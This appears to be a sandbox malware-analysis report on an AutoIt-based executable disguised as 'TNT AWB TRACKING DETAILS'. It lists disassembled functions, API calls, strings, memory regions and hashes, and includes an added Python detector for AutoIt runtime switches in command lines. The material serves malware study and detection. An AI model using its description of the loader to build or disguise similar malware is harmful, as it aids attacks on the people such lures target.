                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: IsThemeActive$uxtheme.dll
                                      • API String ID: 2574300362-3542929980
                                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                      • TranslateMessage.USER32(?), ref: 00409556
                                      • DispatchMessageW.USER32(?), ref: 00409561
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Message$Peek$DispatchSleepTranslate
                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                      • API String ID: 1762048999-758534266
                                      • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                      • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                      Control-flow Graph

                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,00000104,?), ref: 00401F4C
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • __wcsicoll.LIBCMT ref: 00402007
                                      • __wcsicoll.LIBCMT ref: 0040201D
                                      • __wcsicoll.LIBCMT ref: 00402033
                                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                      • __wcsicoll.LIBCMT ref: 00402049
                                      • _wcscpy.LIBCMT ref: 0040207C
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,00000104), ref: 00428B5B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe$CMDLINE$CMDLINERAW
                                      • API String ID: 3948761352-1888923039
                                      • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                      • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
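The string list of this function shows the stub comparing its command line against the AutoIt runtime switches /AutoIt3ExecuteLine, /AutoIt3ExecuteScript, /AutoIt3OutputDebug and /ErrorStdOut, and it does so with __wcsicoll, i.e. case-insensitively. A detection that keys on these switches therefore has to be case-insensitive as well, or a mixed-case invocation slips past it. The script below is an added example, not part of the report or of AutoIt: it splits a Windows command line, matches the switches the way the stub does, and runs the check over a few constructed process-creation records in a minimal key=value|key=value form that is this example's own assumption (only the first path comes from the report; the other paths and the record layout are made up).

```python
"""Flag AutoIt runtime switches in process command lines (added example)."""
from __future__ import annotations

# Switches the stub compares against with __wcsicoll (case-insensitive), so the
# lookup key is lower-cased. The short labels on the right are this example's own.
AUTOIT_SWITCHES = {
    "/autoit3executeline": "ExecuteLine",
    "/autoit3executescript": "ExecuteScript",
    "/autoit3outputdebug": "OutputDebug",
    "/errorstdout": "ErrorStdOut",
}


def split_cmdline(cmd: str) -> list[str]:
    """Split a Windows command line on whitespace outside double quotes (the
    quotes themselves are dropped). Deliberately small; not CommandLineToArgvW."""
    args: list[str] = []
    cur: list[str] = []
    quoted = False
    for ch in cmd:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def find_autoit_switches(cmd: str) -> list[tuple[str, str | None]]:
    """Return (switch label, following argument) for each AutoIt switch after
    argv[0]; the argument is None when the switch is the last token."""
    args = split_cmdline(cmd)
    found: list[tuple[str, str | None]] = []
    for i in range(1, len(args)):
        label = AUTOIT_SWITCHES.get(args[i].lower())
        if label:
            found.append((label, args[i + 1] if i + 1 < len(args) else None))
    return found


# Constructed process-creation records (not a real Sysmon/EDR format). Only the
# first image path is taken from the report; the rest is made up for the demo.
SAMPLE_LOG = [
    "Image=C:\\Users\\user\\Desktop\\TNT AWB TRACKING DETAILS.exe|"
    "CommandLine=\"C:\\Users\\user\\Desktop\\TNT AWB TRACKING DETAILS.exe\"",
    "Image=C:\\Program Files (x86)\\AutoIt3\\AutoIt3.exe|"
    "CommandLine=\"C:\\Program Files (x86)\\AutoIt3\\AutoIt3.exe\" "
    "/AutoIt3ExecuteScript C:\\Users\\Public\\update.a3x",
    "Image=C:\\Temp\\host.exe|"
    "CommandLine=host.exe /autoit3EXECUTELINE \"MsgBox(0, x, y)\" /errorstdout",
]


def parse_record(line: str) -> dict[str, str]:
    """key=value fields separated by '|'; values may contain '=' but not '|'."""
    return dict(field.split("=", 1) for field in line.split("|"))


def triage(lines: list[str]) -> list[dict]:
    """One alert per record whose command line carries at least one AutoIt switch."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        switches = find_autoit_switches(rec.get("CommandLine", ""))
        if switches:
            alerts.append({"image": rec.get("Image", ""), "switches": switches})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert["image"])
        for label, arg in alert["switches"]:
            print(f"  {label}: {arg}")
```

The plain launch of the sample itself produces no alert; the two constructed invocations with a script path and with an inline line do, including the mixed-case one, which is the point of lower-casing the token before the lookup.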

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock$_fseek_wcscpy
                                      • String ID: D)E$D)E$FILE
                                      • API String ID: 3888824918-361185794
                                      • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                      • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                      • __wsplitpath.LIBCMT ref: 0040E41C
                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                      • _wcsncat.LIBCMT ref: 0040E433
                                      • __wmakepath.LIBCMT ref: 0040E44F
                                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                      • _wcscpy.LIBCMT ref: 0040E487
                                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                      • _wcscat.LIBCMT ref: 00427541
                                      • _wcslen.LIBCMT ref: 00427551
                                      • _wcslen.LIBCMT ref: 00427562
                                      • _wcscat.LIBCMT ref: 0042757C
                                      • _wcsncpy.LIBCMT ref: 004275BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                      • String ID: Include$\
                                      • API String ID: 3173733714-3429789819
                                      • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                      • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                      Control-flow Graph

                                      APIs
                                      • _fseek.LIBCMT ref: 0045292B
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                      • __fread_nolock.LIBCMT ref: 00452961
                                      • __fread_nolock.LIBCMT ref: 00452971
                                      • __fread_nolock.LIBCMT ref: 0045298A
                                      • __fread_nolock.LIBCMT ref: 004529A5
                                      • _fseek.LIBCMT ref: 004529BF
                                      • _malloc.LIBCMT ref: 004529CA
                                      • _malloc.LIBCMT ref: 004529D6
                                      • __fread_nolock.LIBCMT ref: 004529E7
                                      • _free.LIBCMT ref: 00452A17
                                      • _free.LIBCMT ref: 00452A20
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                      • String ID:
                                      • API String ID: 1255752989-0
                                      • Opcode ID: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                      • Opcode Fuzzy Hash: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                      • ImageList_ReplaceIcon.COMCTL32(00BE8EF8,000000FF,00000000), ref: 00410552
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                      • API String ID: 2914291525-1005189915
                                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                      Control-flow Graph

                                      APIs
                                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                      • RegisterClassExW.USER32(?), ref: 0041045D
                                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00BE8EF8,000000FF,00000000), ref: 00410552
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                      • String ID: #$0$AutoIt v3
                                      • API String ID: 423443420-4155596026
                                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _malloc
                                      • String ID: Default
                                      • API String ID: 1579825452-753088835
                                      • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                      • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_fseek_memmove_strcat
                                      • String ID: AU3!$EA06
                                      • API String ID: 1268643489-2658333250
                                      • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                      • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                      Control-flow Graph

                                      APIs
                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                      • CreatePopupMenu.USER32 ref: 00401204
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                      • String ID: TaskbarCreated
                                      • API String ID: 129472671-2362178303
                                      • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                      • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                      Control-flow Graph

                                      APIs
                                      • _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • std::exception::exception.LIBCMT ref: 00411626
                                      • std::exception::exception.LIBCMT ref: 00411640
                                      • __CxxThrowException@8.LIBCMT ref: 00411651
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                      • String ID: ,*H$4*H$@fI
                                      • API String ID: 615853336-1459471987
                                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                      Control-flow Graph

                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F3BF51
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F3C177
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateFileFreeVirtual
                                      • String ID:
                                      • API String ID: 204039940-0
                                      • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                      • Instruction ID: 5216b2bc177de98aeaa0b411d5b7a0d336266b7fc6d56dec89a528c021761352
                                      • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                      • Instruction Fuzzy Hash: 52A11575E00209EBDB14CFA4C894BEEBBB5FF49304F248199E515BB290C7759A81CFA4

